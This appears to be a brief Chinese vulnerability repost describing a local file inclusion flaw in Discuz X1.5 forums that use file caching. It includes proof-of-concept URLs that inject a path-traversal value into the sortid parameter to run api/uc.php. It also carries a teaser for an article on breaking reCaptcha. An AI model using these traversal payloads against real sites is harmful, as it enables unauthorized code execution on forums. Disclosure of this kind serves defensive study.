Discuz X1.5 论坛本地文件包含漏洞,当然是有条件的,就是使用文件作为缓存。
作者:Jannock
以下是引用片段: config_global.php function cachedata($cachenames) { …… |
利用地址:
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
执行了 api/uc.php 页面代码了。
文章来源于lcx.cc:【漏洞】Discuz X1.5 - 论坛本地文件包含
相关推荐: 本是同根生,相煎何太急-用Google语音识别API破解reCaptcha验证码
from:http://www.debasish.in/2014/04/attacking-audio-recaptcha-using-googles.html 0x00 背景 关于验证码和验证码破解的入门,请看:常见验证码的弱点与验证码识别 什么是reCap…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论